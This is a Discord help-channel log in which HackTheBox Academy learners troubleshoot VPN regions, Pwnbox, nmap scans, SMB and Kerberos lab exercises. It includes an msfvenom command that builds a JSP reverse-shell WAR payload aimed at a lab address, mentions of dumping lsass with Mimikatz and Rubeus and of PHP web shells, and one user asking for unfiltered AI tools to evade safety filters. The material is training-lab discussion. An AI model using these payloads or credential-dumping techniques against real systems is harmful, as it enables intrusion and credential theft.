Maybe yea.

There is no "competitive VPN" on Academy. Academy is just the educational resource HTB provides, sounds like you're on the wrong VPN.

Try changing regions.

no no Im saying I can connect to the app.hackthebox competitive VPN and it works. On academy im trying the academy VPN and doesnt work. Ive tried changing regions too but no avail

Try rebooting your whole system (not just vm)

Im using WSL2, rebooted entire machine. I was able to connect yesterday just started having issues today

Also tried UDP, doesnt really help

so it's either your computer or htb. you can try changing regions to something totally different like usa/eu or reach out to official htb support for htb platform issues. I'm unfamiliar with wsl so I can't really comment on that, but I know a lot of people have problems with wsl instead of just using a traditional vm. another thing you can do is reset your entire network stack and reboot your computer and try again

netsh i i r r

netsh winsock reset

you'll need to run these commands in an elevated command prompt and it's going to wipe any custom static ip/dns settings in ncpa.cpl's adapters

Still being weird.

Try pwnbox

that will rule out if it's your computer or the platform

don't forget to disconnect from the vpn if you use the pwnbox

https://status.hackthebox.com/

Barely works on there either.

ah it's pwnbox issues

then reach out to support

Pwnbox just says "There are no available instances. Please try again later."

It’s just the spawn on that module.
The other module spawns work fine.

I wrote to support lets see

was looking at the status page to make sure

Guess I’m done for the night.
See how it acts tomorrow…

Yea, mine does that sometimes.

ooh

I feel like this is a "connect from India issue"

i tried SG server

Support will be back in an hour oof

ok

it is

at least for pwnbox

Even for VPN

so ovpn would be working right?

Right.
Everything is weird tonight.

Thats unfortunate. Well Ill wait an hour see what support says, keep yall updated

for me it's not night i just started my grind 10 minutes ago

I’m having issues with machines on a particular module.
Idk what’s going on.

starting a day with this error uff

I’m in US.
You must be in a different country.

Ive had that before but I just moved to a different module and stated there, terminated that and restarted back and seemed to work

Samsiessss

Okay so I can spawn a Pwnbox for UK region

so now on to VPN pack

Yes, imma gonna just get of the box for a few.
Check back later.

imagine the state of the server temp if it was in India

Hello Guys, I need some clarification

Attacking Domain Trusts - Child -> Parent Trusts - from Linux

I try to follow this module with my own Host by using tunneling with ligolo-ng

All commands in the module work on my host with the tunneling setup except the psexec.py and raiseChild.py commands. As you can see in the figure, psexec.py works fine on academy host but not on my own host.

does anyone experience a similar scenario and issue and how do you resolve it ? Thank you!

name or service not known

try adding psexec.py file directory in path directory

for kerberos auth you need to add the domain name/host name/dc name to your /etc/hosts

Okay guys so support kinda has no idea either

uk version is working 🔥

do you thing country high temp can affect server issue

ADCS Attacks > Certifried > I can reproduce the attack up to the certipy auth command. Then its always a timeout. I have tried adding -dc-ip, -ns, -dns-tcp, setting a high value to -timeout and rebooting/resetting the lab box 3 or 4 times. Any ideas?

I have also tried running the commands from the pwnbox, same timeouts.

You mean the PwnBox yes?

i saw a meme where people are cooling the transformer with basic cooler

Anyone having trouble with the Windows Event Logs and Analyzing Evil course? Specifically the tapping into ETW module? It won't let me post the screen shot in here for some reason, but I can't navigate to \Tools\GhostPack Compiled Binaries in Powershell as an Administrator as it keeps saying that the "Compiled" argument cannot be used. I'm a noob at this, and I can't seem to find any fix online, and been struggling with this particular part of the last week. If anyone has any suggestions, I would appreciate it!

When you have spaces in the path you should surround the path with quotes
Powershell was thinking your path ended at Ghostpack and thought u specified Compiled as argument

cd “C:\Program Files\”

This worked. I'm just struggling on finding what I need in the etw.json file now, and I appreciate your help.

i am currently at the module windows priv escalation, i need a admin powershell, but i cannot type in a "@" when i get prompet for the password, is that right?

is the box in UK keyboard layout 😅

i think so...

Is it just me or the VPN is not stable at all

I'm loosing connectivity every 2mn

i tested with a notepad...but i do not find the "@"

I was half way into typing this

Can't do anything, have to reconnect openvpn every time

I am unable to connect on any VPNs

Seems like an outage

i brought up onscreen keyboard (this is my win10 VM)
on ur keyboard it shouild be "

I'm able to connect and ping for maybe 1 or 2 minutes

but then it becomes unreachable

Loosing all revshells and progress

Which VPN, region?

ah nice one, thank you!!

EU-Academy-2

Changing vpn seems to be the solution

Yup yup, my current work around as well..

for me I am not even able to connect via VPN, ( though HTB lab VPN works fine)
I have tried eu2 , eu1, eu5, us1 ( TCP , UDP ) as well, and still no luck

tahts my problem

hmm hey thier

so u got the repo wrong

it asks for password and username because its a private repo

@tender nimbus

is the repo private?
as in can u see the repo in github on icognito tab?

if it is private and you want to clone it then install github cli
and then run gh auth login

You was right 🙂

it was the wrong git ^^ thanks for you help and advice

Hi. Yup, I, again, have a problem. I tried to install Ubuntu for wsl2 on my windows vm, I checked the right option on Virtualbox to do a nested virtualization, but I still can't install Ubuntu. When I do systeminfo in the vm, it says : "An hypervisor has been detected, features of Hyper-V will not be displayed". I tried turning off hypervisor on the vm but it didn't work too

Wouldn't be better to install directly Ubuntu if you are using VBox avoiding nesting things?

ubuntu and wsl... oof

good luck

When I was in a bootcamp for web dev, they say Ubuntu in wsl is great

I already have Parrot OS in another VM. I'm just following the module Setting Up, section Windows

sorry to border you again but do you know why i cant run the script here? Why should it be a zip?

Yeah when i want to launche the script i have this at info its about Pyphyser (educational purposes)

which script is this ?

And i followed the same steps in the readme

yes

what module is this for?

Its not for a module yesterday i was at Cybersec Europe 2024 and their was a lab where we used it so i was curious and i want to try it at home rn to see how this kind of stuff works

Module: Using Web Proxies > Burp Intruder

I have attempted to fuzz using the common.txt list on the target, the only things that show up as existing before the module times out is ||.hta, .htaccess and .htpasswd|| which are all 403 errors. I have looked in the source for all these pages for the flag, its not there. Im clearly doing something wrong if the module is timing out before I can find a html file. Any ideas?

Since AI like ChatGPT likes to filter questions if they seem questionable, do you have any open source AI or other AI tools you use that are unfiltered

Since intruder in the free version is damn slow I did solve it with FFUF.
EDIT: I have spin up the lab quickly and I had a hit with Intruder as well. I have unchecked the "Payload Encoding" (but shouldn't matter), and just make sure you placeholder is well positioned

@tender nimbus which company demoed pyphisher

Headmind partners, they did that to sensibilise other companies ao they awar of fishing

are you belgian?

Yupp

🙂

keep the conversation in English

How did you solve it with FFUF?

in the same way you do fuzz for directories but you add the -e flag for ext

👍

okidoki

i'm struggling with the end of module assignment for the module shells

Currently I am trying to exploit the first machine via the tomcat server

I have tried uploading a jsp reverse shell payload in war file format

the tomcat server seems to timeout when i upload the war file

Hey all, is anyone facing any high latency on Academy lately 1000+ ms in their region for Pwnbox

and I don't understand why

I don't use pwnbox

well I don't know and don't remember if there is a firewall I didn't check when I got access but anyhow which port are you using to get the revshell? I can see from my notes that I did this from the pwnbox for some reason and it worked

well i do it from the machine that has the foothold

since the tomcat server is on an internal network

it is and I didn't have any issue getting a call back

i can connect to the tomcat server

it's the upload that doesn't work

so clicking on the deploy button on the manager app the browser timesout

Ask su... wait a second

let me see if I have time to spin up the target, in case someone else will help you

Bro thay page looks scuffed I don't recall the page looking like that

Could be misremembering though

true that! I got the same feeling

i'm using the links2 browser

it's txt based

Well use firefox

Links2 looks gross

otherwise i can use firefox i suppose

🙂

And at least eliminates the feeling of it being scuffed

maybe i will spin up a proxy and use firefox on my machine

Brother

question for intro to malware static section, I placed the exe on the C:\Alpha\static but still no flag

Firefox exists on the jump host

strange i don't see it

Just type firefox in the terminal

let me check properly

which firefox returns

/usr/bin/firefox

Again

doh

launced firefox

I am having trouble with HTB Academy module Password Attack - Pass the Ticket with Windows. I have connected to the target with RDP and opened a cmdline terminal. When I export the keys, I only get 2 keys for username MS01$, not any of the other users listed. I used Mnikatz and Rubeus and get the same results for both. What am I doing wrong? Need a hint.

This probably eliminates half your issues

Try dumping lsass?

Lsa != lsass

So they store different things

Will try that.

pretty much the same result as when i used Links2 and chromium via Burp

maybe i'm on the wrong page

that's the section of the page i am using to load the war file

That looks correct

mmm i figure

I generated payload using msfvenom

msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=4444 -f war -o reverse_shell.war

I'm having trouble with Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux. I've tried getting GetUserSPNs.py to return the TGS for sapsso with both users wley and forend. TCPDUMP shows me reaching out to 172.16.5.238 and it not responding, eventually I get error 'Principal: FREIGHTLOGISTICS.LOCAL\sapsso - [Errno 104] Connection reset by peer'. Any hints for me?

Try changing vpn region

OK - which region do you suggest? I'm currently on US Academy 3.

Wasn't talking to you really

But just try a different one

ok will give it a try thanks

Hey MarcieLee. Thanks for the hint, but the problem was that I was stupid. Didn't use the cmd terminal as admin the first time. Everything is fine now, and was able to export all keys.

Well yeah

Most of the stuff required admin

solved now right?

GM ! , Im new in HTB, I got into the pen testing job path , i don’t use the pwnbox, I use my own VM , every section exercise HTB gave me a VPN file to download and exec on my VM but as I am moving forward with new sections and modules when I have to solve a exercise HTB doesn’t show me the option to download the VPN file , should I re download the old VPN files i downloaded before? Or I suppose to download a different VPN every different section / module ? Thanks in advance

you'll only need to download it once

only reason to download again is if you're chaning vpn servers

Got it thanks 🙏🏼

I am doing RDP to the Target Machine and this is what I get? Any suggestions what might me wrong?

which module is that?

Its Windows Attack and Defense

hmmm i still get connectikon reset when trying to upload my war file payload to the tomcat server

ok, i've not done that one yet

Other section's machines are working fine, this section tho :((((

but the message you get seems like the workstation you are attempting to logon from is not joined to the domain perhaps?

But its HTB's own workstation, Thats not possible

Try EU vpns

It's still possible

perhaps it's then due to permissions

ALright lemme try

yeah indeed

The US vpns seem busted

i've tried a de vpn

Hiiii

There's no "de" vpn

it's strange though cos fair enough if the vpn is busted

but i wouldn't expect problems between machines on the other side of the vpn

There's EU-Academy-[1..5]

If i use kali linux instead of parrot is there any problem

nope

When playing machines

use whatever you like

Vpn dictates the target spawn conditions

Is that to me

Pwnbox region dictates pwnbox spawn conditions

It's in general

my bad

As I've repeated this ad nauseum

Hmmm

Pwnbox region != vpn region

yep

misclick

not paying attention

Did kali have everything to play machines

I just tried with several us vpn servers btw @zealous rune they all time out; the EU one worked first try

ok thx

i'll b there in a sec

If you're talking about machines on the main site, and not academy, wrong channel

no, a distro will not have everything you need to complete some boxes

thanks for testing that

Np literally uploaded instantly on the EU one, no waiting

Sorry I didn't know that

Read and follow #welcome to gain access to more of the server

I just tried EU Academy 2 and the command I was trying worked. Both US Academy 3 and 4 are broken for this exercise.

Us servers in general aren't working

:p

Would you suspect that the VPN is working but perhaps the VM environment is broken? Or you combine those two generally into VPN when you say that?

At least for modules that may have internal networking

VPN dictates the target spawn conditions

If changing to EU fixed it; then something on the US VPN network is causing the VM to not spawn appropriately

is it recommended to use the pwnbox provided on the HTB website, or to vpn connect using a vm on your own computer?

Whichever is more comfortable for you

I generally only use the pwnbox to troubleshoot

I have more control over my own vm and tools

And I don't have to reinstall those tools every time I launch it

i'm downloading a kali iso and it's 3gb which is taking my computer forever to download 😭 so i just wanted to ask in case the pwnbox is, like, amazing in comparison to a personal vm

If changing to other vpns also doesn't resolve; then the vm env is broken

¯_(ツ)_/¯

Once you set it up it's more of a convenience thing

good enough for me, i'll wait out the download

Also what are you on dial-up? 100Mbps caveman internet?

i think my vm is better than the pwnbox in every way

im on my phone's data

except for python

That's because it's yours

exactly

Oof yeah tethering sucks

Especially depending on your carrier

Thanks MarcieLee - does a status.htba.com exist or something similar? Would be good to know to avoid something not working right.

the only thing the pwnbox has me beat in is having python 2.7

https://status.hackthebox.com

Skill issue

shit doesn't work when i build it!

i don't need python2 scripts anyway

*2john begs to differ

worked

TY

thanks

never used a 2john script in my life

Well if you do password attacks, you'll use it

furustrating, but that connection on the reverse shell listener makes it worthwhile!

fuck!

:)

(Venvs are the way to go)

Or if you're brave enough, debug the script

To make it work with 3

halfway done with the download

blackarch looks cooler though ngl

Blackarch is also 10x more work to set up

but... look cool

crow instincts

is there something up with the pwnbox instances? i keep getting this popup

Try changing pwnbox regions

i did

but i keep getting the error

also when i try to rdp via my kali, rdp cannot connect to the target ip. Ive been trying to do this exercise for the last 3 hrs and i just keep having issue connecting to the target

https://academy.hackthebox.com/module/115/section/1106

tried all eu servers

Since I had experience this issues yesterday

I get fixed by download the ovpn again

Pwnbox region != vpn region

Downloading the ovpn would have no bearing on the pwnbox

Pwnbox region = Pwnbox location right?

Yes

The SG server in this instance from your screenshot

I'm based in SG and ive never had issue with the latency wile using sg pwnboxes. but sometimes i do swap around the eu servers when the sg latency gets very high

Yeah latency can be a factor with vpn+pwnbox

but tonight, i just have difficulty getting the pwnbox to start and/or getting rdp connection to the target via kali :/

¯_(ツ)_/¯

I take it the target is meant to be rdped to

Also when you change the vpn region you have to respawn the target

yea it's this exercise

😮 really

Yes

ok i'll try that

Again vpn region dictates target spawn

Your initial target spawned on your first vpn server

And if you don't reset it, it remains on that server

ok - retrying

How does one redirect traffic to ZAP? ZAP doesnt seem to have a built in browser like burpsuite.

Proxy

I believe the proxies module goes over setting up burp and zap

getting this when I try, must be doing something wrong

Is zap open when you have the proxy set?

yup, that it is

Also are you using the extension "FoxyProxy"

I wonder if I can do the zap questions using burpsuite

Probably

and nope, am not

They both do the same thing

plugins like foxyproxy and switchyomega quickly let you set proxy settings fro your browser, or you can manually set them. From zap you can choose manual scan and launch a browser which will launch with the proxy already configured

Zap just doesn't have the limits that Burp does

what one of these would I use to convert my payload to md5?

server is expecting an md5 of a username

(trying to fuzz to get a cookie)

nvm i just converted it to md5 manually

finished the shells module

thanks all for advices

thanks @fathom pendant for the shout to use a different vpn

had me stuck for a good while

Yeah the vpn's seemed quitte buggy today

np i'm chatting with support now about it :) told them that the US VPNs seem to be having issues

the EU one worked first shot

yeah. it's actually quite a tricky little thing. Cos i never even thought the vpn could cause this issue, since the interactions were between machines on an internal network on the other side of the vpn

it wasn't even like i had crazy latency between my machine and the rdp foothold machine

Module: Introduction to Windows Evasion Techniques
Missing tools folder?

does the module state there's a tools folder?

What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?

does anyone know how to find this

hmm i think this might have come up before

but I've just completed teh shells module and it doesn't show as completed in the Dashboard

under cpts, PHP web shell

Use what you learned from the module to gain a web shell. What is the file name of the gif in the /images/vendor directory on the target? (Format: xxxx.gif)

i can upload the php file but when i redirect to the following path. /image/vendor/connect.php if show not found errror. can someone guide me. thnk

yea

can anyone please help me

reseted twice now

try changing to EU vpn

otherwise chat support

there's a find command they give you

they also expect you to be ssh to the target

as per the first question instructions

You are on the wrong VM. The tools folder is only on the Evasion-Dev VM

this is the part i am confused with

?

ssh [username]@[target_ip]

Oh yea. Thanks

then when it prompts to password you can just paste the password

[terminal you need to add shift to the paste shortcut]

what exactly confuses you about this?

i believe the module/section tells you how to connect via ssh

I am connected to the Htb ssh server

you messed up the error redirect

^

put a space after the last character

2>/dev/null shouldn't have anything directly before it

I did that but it’s not bringing out any error message or any output

you're missing the - before 28k

-size -28k

also

it's -name *.conf

it seems like either you copy/pasted wrong

or you changed things in the copy/paste without knowing

from what it looks like there's some missing info for it to grab what you're looking for

(note the error redirect also hides if it doesn't work)

Module: System Management
Section: Task Scheduling
Link of Section:
Description:
I don't understand what answer this question expects... 🤔

Module:
Section:
Link of Section:
Description:

follow this format when asking question

systemctl cat [servicename]

you can see a lot about systemctl using man systemctl

can yall pin this?

so i did this, its ok?

feel free to do so

we plebs can't

it's up to mods/admins/staff

and even if it's pinned no one reads that shit

so...

would be nice is others did that, it really helps speed up replying to a question

ikr

heck half the time people's questions have been answered via searching

also very true

just let it complete

Actually I would have detailed the section/module for other questions.
But for this one I supposed that the question was precise enough for it to not being relevant

ok

don't do ctrl-C or anything

when you ctrl-C it cancels and doesn't provide any output

it still helps

its normally that its take a time?

too many people just repeat the question and don't state what they have/haven't tried

it can take a few minutes; take into consideration that it's 1 identifying open ports and 2 running a version check against the found ports

normally running nmap scan on pwnbox will save more time

eh

i wouldn't advise just spinning up the pwnbox to do nmap scans

not to mention it can cause more issues if you don't terminate your vpn connection

ok, but now i cant see the vs of the port 8080

is vpn working for everyone?

what is your goal?

Yes, try switching to a different server or re-download the config if its not working

i did that

still it doesnt work

no tun0

https://help.hackthebox.com/en/articles/5185536-connection-troubleshooting

it is working for others?

i try to compler Service Scanning in getting strat

and i asked" Perform an Nmap scan of the target. What does Nmap display as the version of the service running on port 8080?"

sudo nmap <ip> -sV -sC -p 8080 --min-rate 1000

Review the section, the answer on what you need to do is there

there is something wrong with academy vpn it doesnt work

there's very little point to using --min-rate if you're only hitting one port i think

does vpn work for anyone?

Please someone guide me

Again yes VPN servers are working. I provided a troubleshooting guide from htb to help you out. Reach out to support if you are so set on it being on their end.

<@&861185840277487616>

i tried running normal htb machines vpn and it works fine

Oh sry my bad

Sry bro fr

i downloaded new vpn connection file and it doesnt work so i think from myside its fine

Try a different server then

i switched from eu to us

ty

so i run nmap again and its still didnt work for me

You're leaving out a very important flag for nmap that will provide the results you seek

amm and what is that?

review the section you are on, the section provides an example

ok it works now

sC? or p?

You asking or trying? 😛

both🙃

-p- tells nmap to scan all ports, default is top 1000, you can also do -p 22 to scan a specific port, I will let you read up on the other one 😉

so i did this comman - nmap -sV -sc -p8080 ip

am i right?

and still

combine into -sVC

from some reason

i cant see the version

use sudo

whats the point of silver anual subscription

montly billing for a year is 216 but annual is 490 how does it make sense

even now

same with gold how come its 1260 its just scam lol

..

The annual subscription gives you access to the mentioned content right away, while the monthly one gives you a certain amount of cubes, well, each month.
If those cubes are not enough, you'd have to wait one month to receive more.
The monthly subscription may be cheaper in total, but it also takes longer to unlock a given amount of courses.

what if i buy silver monthly and then cancel and buy again like this for 12 times

thats not how it works

your sub lasts for the month

so you can't just do that

aw

it sucks tbh at that rate 1 module per month is so slow

Well, that's the trade-off.
More money for instant access, or less money for a more "time gated" approach.

Thank you @tranquil axle , that was the solution.

The annual subscription also includes an exam voucher and the option to view a walkthrough

Against what is your running this one

I did that accidentally, (i was checking whether clicking another subscribe button, will it give me a popup for card details, but it just went through without giving me any pop up), fortunately, the help staff, gave me back ny previous subscription and cancelled the new one.. (also there was a renew option that you had to wait for a month before buying another monthly subscription,)

Annual also includes a voucher $250 plus some other perks

i cant afford it anyways

You can also buy a Platinum subscription. Then you get 1000 cubes per month

hmm platinum seems a good option

im still at 70 cubes 😭

You aren't connected to vpn, that's why i think you get Http 404 error

Skill issue

If they weren't connected to vpn they wouldn't see the port as open

Ooo,

so.. what is my problme?

Not yet i had to leave so still the same problem with the ZIP problem

Likely the vpn, are you using a us academy vpn?

If so, switch to one of the EU ones

To do so; first ctrl-c on the vpn that's running

Then switch to one of the EU ones and download a new vpn

Note: you'll also have to respawn the target

It could also be that it's designed to be a 404

¯_(ツ)_/¯

Module context matters

In future; please include module name and section name when asking for help

It helps others provide better troubleshooting than guess and check methods of troubleshooting

is the username for the attacking gitlab section in attacking common applications on the xato list in seclists

we can go to the pavement mate lets go

https://tenor.com/view/yeet-bear-knockout-kick-adorable-gif-17809969

Child

Sit down and do your work

If you want more cubes, buy them

You can't go + in cubes by just doing modules

Tier0 gives back 100%, tier 1+ gives back 20%

There's never a net gain

i am stuck on this question

I mean

I found the keytab of user ||svc_workstations|| in crontab and used it to impersonate

It kinda tells you what to do

||keytab extract||

There's a subsection regarding it

||keytab extract|| gives me ||AES-256 HASH|| hash for user ||svc_workstations||
and i cannot find other keytab

are you sure? Have you done a ls in the directory?

could someone help on this

Use whatever wordlists the module primed you to use

😂 found it

perfect hint

do you know javascript

I barely know English my guy

k

ur a ctf player right

Lol no

wtf are you doing here then

What module is this in relation to?

Cause I liked academy and joined

¯_(ツ)_/¯

ok can you review my add-on please

No

As it has nothing to do with an academy module

Go to #programming (read and follow #welcome to access)

i can't write on other channels

k thanks

anyone help?

in Service Scanning

host unreachable, seems like the host isn't online

^

Make sure you use the target ip, not the example

hey team can some one help me with password attacks module and Pass the ticket from linux section last question

dont ask to ask buddy just paste the questions here

“Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).”

Well, did you find the ticket?

with this question

What have you tried

no i can’t find the ticket

i ve tried all

stuck here 3 days

Hint; use the tool showcased at the end of the section

It should reveal some nice keytab and ccache file locations

Also the full usernames for this section have been user@domain

as i understand i need to use both of them right?

Only one or the other

If you use the ccache you don't need the keytab and vice versa

do i need to add @inlanefreight.local or something to the username

Hey! I was wondering if anyone could help me figure out how to read the contents of a text file with SMB. I am new to all this so if I need to supply more information let me know.

Type

Or more

Spoiler

is this right cache?

I'm not answering yes or no. Try using it and see

Try and fail before asking

Brother

Still a spoiler

As it contains the filename

download the file using get <FILENAME>, you can read it then

That works too

This worked. Thank you so much! I was stuch here for a solid hour banging my head against a wall 🤣

I did this and it told me the size and length but not the contents.

?

You just read it on your local system

You can exit

Man its my first day 😭

Once you exit smb you'll see it

And you can read it there

Holy wait you are so right I just had an aha moment

😭

I believe you can also do !cat filename from within smb (if you're on linux)

! Indicates to smb you want to run a command on your local system

Neat! Thanks so much again for the help!

ive found the username ||hacker||, but it still doesn't accept the answer

nvm

did you get it?

u got this bro

(i cant help you ik nothing)

for the Mongod machine. how am I connect? bash: mongo: command not found

Wrong channel, read and follow #welcome

This is a starting point machine yeah?

#starting-point would be the place for it

Also (install the tool)

I do not have access to this

I can not access the link you send me

Read again what Marcie has written. Especially the part with #welcome

thanks

@errant siren i have the same problem too

i feel like there is an error getting the flag

i dont think people have even done that module here

There are people that have

they just aren't active

you can also chill out

have you tried changing vpn regions and doing your enumeration again? I take it the module taught you basic enum tooling

that module is part of the bug bounty hunter path

also 0.3% @ 3.9k users is insane

So many people sign up and don't do anything

yeah it's insane

The module describes a program with which you can enumerate a WP site. Use it

Every user who has created an account at some point is counted. Whether active or not

hacking WordPress Skill Assessment - Bullshit Module

The program mentioned above shows you everything you need to know to find the flag

You don't need a shell to find the flag

what?

https://tenor.com/view/perfect-popcorn-michael-jackson-gif-26271837

Just dumped all my cubes to revisit the basics of EVERYTHING apparently the only good thing about my computer is showing me how much of an idiot I actually am.

Thank you technology...

stares at my pc what are you hiding from me

https://academy.hackthebox.com/achievement/361921/path/18

Gz

nice flex

someone help with this?

Probably not, this isn't the place for that. This channel is about the modules on the HTB Academy platform.

is #red-team more appropriated?

The error looks like it's expecting a file

But that's just a guess

Feeling like an idiot is a natural side effect of learning something new. Some days, feeling stupid is basically all I do. Also I routinely go back and revisit fundamental modules. The fundamentals are everything. Don't be hard on yourself if you like like you're learning too slow, or having difficulty grasping a certain concept. The content here is meant to challenge you.

Rocky fundamentals can lead to bad habits

Anyone have any tips for this Evil-WinRM error: Error:

An error of type HTTPClient::ReceiveTimeoutError happened, message is execution expired
Error: Exiting with code 1

I'm doing the Attacking Enterprise Network module and I've uninstalled and reinstalled the latest version of evil-winrm, ruby, etc. Tried a custom OpenSSL conf file and that's not helping either. I've tried accessing the necessary host via RDP but that's proving unsuccessful as well

Edit: Should add I'm on ParrotOS in case that's relevant

looks like a timeout connecting to the target. i think evil-winrm has a timeout argument -t <seconds>, try a larger timeout window

Yeah I was looking for a timeout argument in the help output but there wasn't one. I tried it just now and it's an invalid option

I know xfreerdp has one which is helpful wish there was one for evil-winrm

If you're running the US vpn, try EU

Okay I'll give that a shot

I wrote to support a while ago regarding US vpns being terrible

Thank you so much it worked! You have no idea how much this has been frustrating me, since last night I was trying to get this to work

Again US vpn being shit has been brought up to the support team

So hopefully they fix it

last seen 7 hours ago
Was my chat with a support rep earlier today

yes I have a problem with the VPN too

@west canopy @fathom pendant Thanks for the words of wisdom.

I stumbled a bunch

and some of it was me just learning to just read the god damn question

However, first of all, we have to fail. It is an unavoidable and essential part of learning. This is one of the parts of the learning process which make us successful. Experience is built on failures. It explains that we know how to handle different and sometimes adverse situations where something does not work as expected.

This was much needed lol

check the last line and the whole thing

As long as you question and learn why you failed you will ultimately succeed

This is the way

Why did this command fail? Oh I missed the syntax --> fix

my guy that was about a month ago 😭

in nmap module in port scanning section, it says (i think) "if the filtered port scan takes long time, with syn scan(-sS), it means the port is unreachable due to other reason... then it sends a ICMP request to another filtered port as an example where the output is received fast, with an ICMP error code 3, indicating that the firewall on the port is rejecting the packet".
is the statement true, or i am not understanding something?

https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtml

it just depends

ICMP is weird like that (if it responds at all)

my understading is that, if its even a -sS option scan on filtered port, and it takes longer time, it's due to other reason, and if takes shorter time, it's due to firewall?

you're thinking backwards

If you suspect a firewall, try -V5

if you're scanning -sS directly on a filtered port that's different

in my experience, something like a host based firewall (i.e. Windows Firewall) will have a port show as filtered

thanks

filtered is just nmaps way of saying whatever packet we sent did not get any response from the server, period.

under the ICMP error 3 (Host unreachable) there's several sub-errors as well

which may get sent back

if a port is closed , it responds with RST

the iana link i sent earlier contains all the ICMP errors

RFC 792 and RFC 1812 cover ICMP error code 3

https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtml#icmp-parameters-codes-3 -- direct link to section

marcie you never cease to amaze me with your knowledge on these niche things

i think of ICMP as a ping pong ball

I just used google

i remember reading up on them a while back ¯_(ツ)_/¯

mastered google-fu

and who better to trust about a protocol than IANA

thanks

if you're getting a reroute, it's ICMP error 5

don't tell them we just google the answer or they'll start trying that first

well error

code is more apt

ICMP is just traceroute, professional ping pong but with ores as ping pong paddles due to regulations of the sport

hhhhh

I mean, im surprised the default answer to peoples questions hasn't just become "Use ChatGPT bro"

traceroute is built on ICMP

i think linux traceroute uses UDP by default though?

asking from an experienced person directly is different, their answer make sense more

it depends

it can do icmp and udp

and tcp i think?

Yes, ICMP is pingpong, and traceroute is with ores and you have to wear something sexy for the crowds

but i think most stuff now uses TCP/IP stack protocls

there's nothing wrong with asking for help, and i wasn't really talking about you specifically, we get a ton of people who just don't google the most basic stuff first. more making a comment on it in general.

^

true

i will be the first to say no one ever got anywhere alone, we have all learned from someone. where would humanity be without each other.

he was more making fun of the fact that half of the time my answers are just "Googled it"

I dont make fun of people, I make people with fun

ayo???

Don't sweat the petty things in life, pet the sweaty things

AYOOO?????

Cybersecurity is just an expression of my ego

(HUGE)

Hope they announce the new CRTO competitor cert tomorrow

he man. Ive been experiencing the same thing for 3 days now. 3 nights ago i was able to login to the DNN portal download the .exe files nec. for priv esc. executed them and got a reverse shell as the NT Authority user on dev01. Got late and I shut it down thinking the persistance we had set up i could get right back with no problem. hahahaha yeah right. for 3 full days now, 3 new vms, anything and everything i could think of. Ive messaged support a couple of times. the login portal will load right up. But after entering creds it just times out. please tell me u found something....

Honestly I just kept respawning the target until I could log in without issues wish I could give you a better answer than that. Try switching your VPN servers I did that too and today that solved another issue I was having today . I switched from US To EU VPN today and that seemed to really help with connection issues today

I have done all that. so thats what you done, kept messing with it until u found a host that would let you log in?

thanks man. That helps more than u know. I'm trying to figure out what I'm doing wrong u know. But hey, Ive went back through the module several times... lol

Might be a good time to learn how to script your exploits

anyone knew this?

Looks like you are navigating to a file

Don't do that, navigate to the directory

Just go to /images/vendor

then ls

Are you trying to execute a webshell?.

genuinely what you could be doing wrong is using the US vpn file

you might need to use a tool like burp as shown in the module to check this

^ you don't sound ready for curl, your biceps are not ready

(not you marcie)

you have the webshell correct?

you should be doing navigation from within the shell

this module is VERY MUCH step-by-step

I also take it you're referring to the "Shells and Payloads" module

as there's no "PHP shells" module

We love to see it

Impulse questioning

¯_(ツ)_/¯

Blud dipped immediately too, yee haw 🤠

for some other modules i can see some questioning

but this specific module is step-by-step

because the focus is on actually interacting with the shells

as each type of shell has their own ways

basic webshells being the ?var="system command"

The road to shell is paved with good intentions

(and misconfigurations)

oh switch to a diff vpn server

you're a day late and a dollar short on that suggestion lmao

yeah i just saw when that was posted T-T

It seems the US VPNs are having issues with targets that have any level of internal networks

it randomly went to a day before chat

but discord is improving

https://tenor.com/view/copium-meme-pepe-frog-gif-26117735

US VPN seems fine for single hosted targets (at least afaik, haven't tested)

Messaged support earlier, they said they raised the issue and will get back when resolved

yeah. correct. just to check i need to change the content-type right to images/gif before forwarding in burp.

I don't know if i'd say improving. There are far less people around in general, and to help with questions, and the mods still seem impossible to get help from

I've been trying to get my account verified for over 24 hrs now so I can use the other channels, and it seems I am being ignored

i meant discord as in the app

dont u just need an account identifier thats found on your htb acc

you do

Irregardless

Yes, I get an error

but if it's linked to another account, it has to be first unlinked for you to link it again

ah i see

How do I unlink it? That account is deleted

backend basically ticks a true/false flag

you can't a mod/admin has to

support can

which u gonna have to wait lol

support has nothing to do with the discord

That was my impression too

no not discord, htb

@urban sage can we hook this man up

This isa discord related issue

linking has nothing to do with the platform

ohh

I reached out to Nightwolf, he is busy

discord issue i thought it was htb issue

my b

i mean we can see if @slender shoal can do something

Also reached out to him

¯_(ツ)_/¯

Started with Tejas, thanks for the support though, marcie

i haven't seen him do much of anything in the past like month

patience my child

Yeah i would generally go with people who have the "mod" role

not Staff in general

I am patient, it's just I understand this discord has lost alot of members and grown in mods, but mods are not around to help

Just something I have noticed

And most mods are volunteers

the ones that also happen to be staff aren't employeed to be discord help

Huh? I was under the impression they were given HTB enterprise accounts

no

they aren't LMAO

mods/admins by default are just volunteers

Then why the fuck would you mod for this server

Weeeeeew

because you care about the community and want to see it grow positively

One moment. I'm almost to a proper keyboard.

BUT YOUR POINT IS VALID

Any communities with nerds are bound to be horrific

eh up until recently moderation was fairly consistent, then THE INCIDENT which i'm not gonna get into and has already been discussed ad nauseum

Sounds scandalous

just decisions that people didn't agree with

I am not interested either way, just here for the Certs

but again decisions nonetheless that we don't know about

based and redpilled

CPTS hashtag soon

3% left to do in the path

Complete side tangent. I've lost count over the years the number of distinct unrelated events "the incident" has been used to refer to. 😂

yeah

Must have been here for awhile...

Sr. work the same as real-life? 7 years of service?

The first one I know of but wasn't here for was Goomba

but gonna stop now

Thank you @urban sage

I've been around in the server since 2019 in some capacity. I haven't been a moderator that entire time though.

Evening all.

Module: Using Web Proxies > ZAP Scanner

I am struggling to find the vulnerability im meant to use here despite following the instructions in the thread. Im not sure if im blind or if im doing something wrong. Could someone give me a hint and what I should be looking for?

It can take a bit to find it

note it will be a "CRITICAL" vulnerability

i think it took like 5-10 minutes to find it

https://tenor.com/view/thumbs-up-chew-eating-chika-fujiwara-kaguya-sama-gif-17941452

I think the first vuln I found wasn't what they were looking for so I just had to wait

